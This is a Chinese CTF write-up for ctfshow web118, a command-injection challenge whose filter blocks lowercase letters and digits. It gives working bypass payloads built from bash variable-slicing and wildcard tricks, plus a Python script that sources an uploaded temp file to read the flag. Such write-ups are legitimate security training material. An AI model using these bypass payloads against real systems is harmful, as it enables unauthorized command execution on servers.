[ctfshow web入门] web118

信息收集

遇事不决先抓包,发现源代码里有注释

输入一些命令,出现evil input,直到尝试到单个字母还是evil input,我的记忆里搜索到,可能是过滤单个字符的题目,那时候我还专门跑了过滤了哪些字符的

使用burpsuite抓包,发送到intruder

得到的结果有两种长度,一种是1155一种是1165,1165包含了evil input字符串

被禁用的字符包括

s 复制代码
%00-%0F
! " % & ' ( ) * + , -  /
0-9
< = > `
a-z
|

还剩下大写字母以及关键的$


解题

临时文件上传

[ctfshow web入门] web56有提到,使用临时文件上传

这里没有了/,使用上面的信息构造一个

中括号还在,但是减号没了,所以我们直接把大写字母写上就行

shell 复制代码
// ${HOME:0:1} = /
${HOME:${#}:${#SHLVL}}
//${HOME:1:1} = h
${HOME:${#SHLVL}:${#SHLVL}}

我怕不够准确所以填了一个h进去,h构造也很简单

其他的太复杂了,我就不构造了,也容易出错,如果不行再继续加码

shell 复制代码
. /tmp/php??????
. /???/?h??????A  这里把最后一个大写字母写作A,一定要在六个随机字母里选一个写成大写字母,否则定位不到
. ${HOME:${#}:${#SHLVL}}???${HOME:${#}:${#SHLVL}}?${HOME:${#SHLVL}:${#SHLVL}}??????A

先试一下有没有evil input

py 复制代码
import requests
from time import sleep

url = "http://8e524b2c-2846-42f6-879c-0ea2627207dc.challenge.ctf.show/"  # http不要s
# . /tmp/php?????A ==> . /???/?h??????A
payload = ". ${HOME:${#}:${#SHLVL}}???${HOME:${#}:${#SHLVL}}?${HOME:${#SHLVL}:${#SHLVL}}??????A"
file = { "file": "tac flag.php" }
data = { "code": payload }

for i in range(1000):
    response = requests.request("POST", url, files=file, data=data)
    if (len(response.text)) != 479: # len可能需要微调
        print(response.text)
        print(len(response.text))
        break
    print(i, end=" ")
    sleep(0.3)

我这里运气好,一下子就跑出来了

截图里的post_url我就不改了,反正没影响,这是抄之前代码没好好读造成的


答案

还记得之前用$和大写字母拼空格吗,其实还是可以拼好shell

我认为这样的答案可行性并不高,因为无法使用打印,所以无法知晓那些环境变量的具体值,这能构造出来一个纯属运气

反正我的知识储备不够,拼不出来,直接看答案了

shell 复制代码
${PATH:${#HOME}:${#SHLVL}}${PATH:${#RANDOM}:${#SHLVL}} ?${PATH:${#RANDOM}:${#SHLVL}}??.???

${PATH:~A}${PATH:${#TERM}:${SHLVL:~A}} ????.???

${PATH:~A}${PWD:~A}${IFS}????.???

当然这是题目,这些信息可以从web29题目中获取的,但并不能保证和本题完全一致

shell 复制代码
$PWD		/var/www/html
$HOME		/home/www-data
~A			-1
${#SHLVL}	1,$SHLVL是2,表示有两个打开的bash,一般不会超过9
${#RANDOM}	4或5
$PATH		/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
${IFS}		空格
${#TERM} 	//没收集到,猜测是5 xtern vt100 vt220长度都是5,而配合答案nl这刚好是${PATH:5}的l

自己组一个echo,可惜不知道为什么失败了,不然就能印证我上面收集到的数据是正确的,也能拿到上面那些环境变量的真实数据了

shell 复制代码
e=${${${${HOME:${#SHLVL}}:${#SHLVL}}:${#SHLVL}}:${#SHLVL}:${#SHLVL}}
c=${${${${${${${PATH:${#SHLVL}}:${#SHLVL}}:${#SHLVL}}:${#SHLVL}}:${#SHLVL}}:${#SHLVL}}:${#SHLVL}:${#SHLVL}}
h=${HOME:${#SHLVL}:${#SHLVL}}
o=${${PATH:${#SHLVL}}:${#SHLVL}:${#SHLVL}}

${${${${HOME:${#SHLVL}}:${#SHLVL}}:${#SHLVL}}:${#SHLVL}:${#SHLVL}}${${${${${${${PATH:${#SHLVL}}:${#SHLVL}}:${#SHLVL}}:${#SHLVL}}:${#SHLVL}}:${#SHLVL}}:${#SHLVL}:${#SHLVL}}${HOME:${#SHLVL}:${#SHLVL}}${${PATH:${#SHLVL}}:${#SHLVL}:${#SHLVL}}${IFS}

上面代码的生成脚本

py 复制代码
def get_string(s, n):
    res = ""
    res += '${' * n + s + ':${#SHLVL}''}' * n
    return res[:-1]+':${#SHLVL}}'

print(get_string('PATH', 2))

web77    目录    web119

相关推荐
Jackson__几秒前
高效 AI 对话:如何写出更好的 Prompt
前端
典学长编程4 分钟前
前端开发(HTML,CSS,VUE,JS)从入门到精通!第三天(JavaScript)
前端·javascript·css·html·前端开发
德育处主任10 分钟前
p5.js 用 beginGeometry () 和 endGeometry () 打造自定义 3D 模型
前端·前端框架·canvas
一只鹿鹿鹿12 分钟前
【制造】erp和mes系统建设方案(word)
大数据·人工智能·web安全·信息化·软件系统
文火冰糖的硅基工坊21 分钟前
[硬件电路-124]:模拟电路 - 信号处理电路 - 测量系统的前端电路详解
前端·嵌入式硬件·fpga开发·架构·信号处理·电路
爷_1 小时前
手把手教程:用腾讯云新平台搞定专属开发环境,永久免费薅羊毛!
前端·后端·架构
狂炫一碗大米饭1 小时前
如何在 Git 中检出远程分支
前端·git·github
东风西巷2 小时前
猫眼浏览器:简约安全的 Chrome 内核增强版浏览器
前端·chrome·安全·电脑·软件需求
太阳伞下的阿呆2 小时前
npm安装下载慢问题
前端·npm·node.js
pe7er2 小时前
Tauri 应用打包与签名简易指南
前端